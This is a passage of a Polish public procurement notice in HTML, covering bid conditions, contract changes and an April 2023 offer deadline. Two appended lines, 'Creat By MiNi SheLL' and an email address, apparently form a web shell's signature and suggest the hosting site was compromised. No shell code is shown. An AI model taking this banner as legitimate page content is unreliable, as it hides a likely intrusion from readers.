(jeżeli dotyczy)<br/>Dowody na potwierdzenie posiadanego doświadczenia<br/>Załączniki zgodne z Rozdziałem XXIII SWZ <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku <br/>wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do <br/>reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. <br/>2.W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, <br/>oświadczenia, o których mowa w rozdziale VIII ust. 1 SWZ, składa każdy z Wykonawców. <br/>Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnienie warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnienie warunków udziału w<br/>postępowaniu.<br/>3.Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty <br/>oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy.<br/>4.Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania <br/>składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zakres zmian umowy został określony w § 10 wzoru umowy stanowiącym załącznik do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-04-28 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/pniewy_wlkp</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-04-28 09:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com